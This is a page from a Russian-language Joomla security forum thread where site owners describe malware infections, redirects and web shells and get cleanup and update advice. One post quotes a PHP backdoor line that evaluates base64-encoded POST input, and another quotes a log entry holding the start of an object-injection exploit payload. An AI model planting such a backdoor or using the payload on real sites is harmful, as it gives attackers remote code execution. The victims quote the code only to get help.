Вирус на сайте, редирект, что делать как лечить! - страница 23 - Безопасность сайтов на Joomla

зачем он ее пофиксил? )

Что бы когда он будет размещать свои скрипты, второй взломщик не помешал ему, например тем же размещением доров или слива трафика, или той же биржой ссылок, это называется шелл в одни руки.

Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?

На счет перемещению сайта, если у вас бональные настройки на сервере то да, последния бага несет в себе RCE - Удаленное выполнение кода, т.е ему даже и пассов от вашей админки не нужно было чтоб залиться, подробней можно почитать http://joomlaforum.ru/index.php/topic,321787.msg1606153/topicseen.html#msg1606153

второй взломщик не помешал ему

Какие жадные взломщики...

В 3.4.6 нету она закрывает все что было в 3.4.5

Это я пару дней проворонил с апдейтом и меня сразу поймали, шустрые ребята, капец...
Спасибо за ответы.

Не за что.
Не храните более одного сайта на хостинге где нет возможности разграничения прав, и настраивайте vps с разделением по правам пользователей и папок.

шустрые ребята

Я обновлял ночью. Через 2 часа пришли.

Я обновлял ночью. Через 2 часа пришли.

А что ожидать когда она уже в паблике, ее просто ботнету отдают (а он не спит и не ест  ) и чем дольше не обновлять после выхода заплаток тем больше шансов получить взлом.

flyingspook а ты можешь мне помоч? Я готов даже заплатить.

flyingspook а ты можешь мне помоч? Я готов даже заплатить.

Могу, подробности в ЛС

flyingspook отписался в ЛС

Всем добрый день!
Подскажите куда копать. Был вирус на сайте(файлы в разных папках) все удалил. Больше файлов вновь созданных, либо измененных нет. Пароли поменял. Папку tmp почистил. Базу посмотрел ничего не нашёл. И всё равно когда заходишь на сайт, когда подгружается страница внизу пишет ожидается ответ от babybanzclub.nl. А с некоторых страниц переходит на какую-то хрень. Где ещё искать?

Где ещё искать?

В файлах, код может быть обфусцирован. обфускация

Подскажите куда копать. Был вирус на сайте(файлы в разных папках) все удалил. Больше файлов вновь созданных, либо измененных нет. Пароли поменял. Папку tmp почистил. Базу посмотрел ничего не нашёл. И всё равно когда заходишь на сайт, когда подгружается страница внизу пишет ожидается ответ от babybanzclub.nl. А с некоторых страниц переходит на какую-то хрень. Где ещё искать?

Проверить- отключить установленные расширения, плагины особо проверить- могут быть замаскированные под оф.расширения .

Обнаружил в логах такую запись (см. ниже). там какой-то странный сайт фигурирует (бургер). На что это может указывать, вирус или что-то другое?

Заразили сайт этим кодом
Что делать ?
Нашел его в шаблоне index.php
Это значит взломали сайт?

Заразили сайт этим кодом

Спойлер

[свернуть]

Что делать ?

Чистить сайт, закрывать уязвимости и обновлять движок и все расширения.

Чистить сайт, закрывать уязвимости и обновлять движок и все расширения.

Да, по всей видимости весь сайт заразили....Нашел еще в папке cache один файл index.php
Который положили туда 29.12.2015
По содержимому не понимаю что это вот текст файла

Есть сохранена база и там такого файла нет
Но не пойму, взломали хостинг или просто увели у меня пароли....

Чистить сайт, закрывать уязвимости и обновлять движок и все расширения.

Вам уже писали, не надо понимать сами не можете наймите кого либо.

По содержимому не понимаю что это вот текст файла

Что его понимать, торговля ссылками.

А как можно выяснить, как меня взломали?
Сменил пароли, теперь почищу сайт, а через время опять взломают.
Так понимаю, что у них был доступ по ftp, раз там лежали некоторые файлы
Вот и не пойму, это хостинг взломали или все таки меня?...украли пароли у меня?

Вас скорей всего, любой из ваших сайтов, и хостинг и ftp тут скорей всего не причем, а смотреть и думать исходя из версий движка и расширений + анализ логов. Вовремя обновлять надо cms и расширения, ну и логин/пас не писать admin/12345.

Ну у меня движок версии 1.5,  все патчи установлены.....Дело в том, что в корне сайта лежат в разных папках файлы, которые же через сайт или админку не положишь
Лежал index.php в папках cache, в папке cgi-bin, это папка сервера..... в начале файла index2.php был прописан код

<?php if ($_POST["mquxl"]){eval(base64_decode($_POST["mquxl"]));exit;} if(isset($_GET["z"])){echo "hashdeb : ssHW698=";exit;} ?>

И по всей видимости он там уже прописан с 21.02.2015 года
Был прописан код в templates, в своем стиле, в файле index.php

18 дек 2013 был заражен сервер, может это все пошло от туда, хотя 05.11.2014 есть сохраненный сайт и там нет записей в этих файлах, а вот еще одна база сохранена от 22.02.2015, то там уже есть запись в index2.php
Кому то нравиться меня ломать перед новым годом

Ну у меня движок версии 1.5,  все патчи установлены....

Это уже помойка. Минимум, что у вас должно стоять - 2.5.28. Да и то расширения к ней датируются в основном 2012-м годом, делайте выводы. А тот код, что вы показали, говорит о том, что кто то извне получил права на запись и внедрил на ваш сайт строчку, исполняющую любой код из POST-запроса (и кучу помимо него). Переносите сайт на новую версию. Других вариантов нет.

@Doc
Вы просто не дочистили сайт во время предыдущих чисток.

Это уже помойка. Минимум, что у вас должно стоять - 2.5.28. Да и то расширения к ней датируются в основном 2012-м годом, делайте выводы. А тот код, что вы показали, говорит о том, что кто то извне получил права на запись и внедрил на ваш сайт строчку, исполняющую любой код из POST-запроса (и кучу помимо него). Переносите сайт на новую версию. Других вариантов нет.

Ну насчет помойки с вами не соглашусь....Им пользуюсь с 2007 года и он мне очень нравиться, а вот новые движки меня просто бесят....Слишком для меня сложный, в 1.5 гораздо все проще.
Сейчас конечно изучаю новую версию движка, хотя уже раньше это пытался делать, но не могу сделать так, что бы мне он нравился....
Для меня Joomla 1.5 версии была самая лучшая, а остальное все фигня полная, как по дизайну, так и по настройкам сайта и т.д
Так, что каждому свое.

Добрый вечер, может кто-нибудь подсказать какие должны быть дальнейшие действия:
сайт Joomla 1.5 отфиксился файлом libraries/joomla/session/session.php, но в логах все равно есть свежий вход с кодом 200
[20/Mar/2016:18:10:44 +0300] 0.308 0.308 200 46.32.225.236 mysite.com GET / HTTP/1.1 "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\....
Шелл был найден и удален, сайт восстановлен из бэкапа, но проблема уязвимости остается...
Спасибо. Консультация знающего спец-та м.б. на платной основе.

В вашем случае сначала надо почистить сайт качественно, закрыть все имеющиеся уязвимости и профиксить последней, если вы что то не дочистите и не закроете возможные дыры, то последняя заплатка вам ни как и не поможет.

Добрый вечер, может кто-нибудь подсказать какие должны быть дальнейшие действия:
сайт Joomla 1.5 отфиксился файлом libraries/joomla/session/session.php, но в логах все равно есть свежий вход с кодом 200
[20/Mar/2016:18:10:44 +0300] 0.308 0.308 200 46.32.225.236 mysite.com GET / HTTP/1.1 "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\....
Шелл был найден и удален, сайт восстановлен из бэкапа, но проблема уязвимости остается...
Спасибо. Консультация знающего спец-та м.б. на платной основе.

Ставте патч против этой баги, наводите профилактические меры работы!

В вашем случае сначала надо почистить сайт качественно, закрыть все имеющиеся уязвимости и профиксить последней, если вы что то не дочистите и не закроете возможные дыры, то последняя заплатка вам ни как и не поможет.

Благодарю за ответ!  flyingspook, напишите, пжта, мне в личку (у меня пока мало сообщений на форуме), если Вы не против, отдам Вам сайт на "качественную очистку" (видимо не все сама вычистила)...

А лучше обновить до последней версии. 1.5 себя изжила в 2012-м году еще...

А лучше обновить до последней версии. 1.5 себя изжила в 2012-м году еще...

Наверно, Вы правы, надо обновляться, тянуть дальше нельзя... А эти вирусы - последний мотивирующий пинок

Наверно, Вы правы, надо обновляться, тянуть дальше нельзя... А эти вирусы - последний мотивирующий пинок

Сейчас актуальная версия 3.5, мигрируйте на нее. Статей по миграции полно, читайте. Сами не справитесь - обращайтесь. Совет: не переносите все подряд на новый сайт, помните, что зловред может быть не только в файлах скриптов, но и в картинках.

Сейчас актуальная версия 3.5, мигрируйте на нее. Статей по миграции полно, читайте. Сами не справитесь - обращайтесь. Совет: не переносите все подряд на новый сайт, помните, что зловред может быть не только в файлах скриптов, но и в картинках.

И в БД!